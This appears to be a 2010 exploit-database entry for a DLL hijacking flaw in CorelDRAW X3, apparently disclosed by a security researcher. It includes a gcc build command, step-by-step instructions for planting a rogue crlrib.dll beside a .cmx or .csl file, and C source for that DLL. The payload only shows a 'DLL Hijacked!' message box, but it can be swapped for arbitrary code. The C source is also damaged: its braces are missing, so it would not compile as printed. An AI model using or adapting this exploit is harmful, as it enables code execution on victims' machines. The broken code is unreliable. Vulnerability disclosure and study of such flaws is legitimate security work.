CorelDRAW X3 v13.0.0.576 DLL Hijacking Exploit (crlrib.dll)

ID 1337DAY-ID-13855
Type zdt
Reporter LiquidWorm
Modified 2010-08-25T00:00:00


Exploit for windows platform in category local exploits

CorelDRAW X3 v13.0.0.576 DLL Hijacking Exploit (crlrib.dll)

 CorelDRAW X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit
 Vendor: Corel Corporation
 Product Web Page:
 Affected Version: X3 v13.0.0.576
 Summary: Graphic design software for striking visual communication.
 Desc: CorelDRAW X3 suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local level. The
 vulnerable extensions are .cmx and .csl thru crlrib.dll library.
 gcc -shared -o crlrib.dll coreldrw.c
 Compile and rename to crlrib.dll, create a file test.cmx or test.csl and
 put both files in same dir and execute.
 Tested on Microsoft Windows XP Professional SP3 (EN)
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com
 Zero Science Lab -
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
    switch (fdwReason)
        case DLL_PROCESS_ATTACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
    return TRUE;
int dll_mll()
    MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);

# [2018-03-19]  #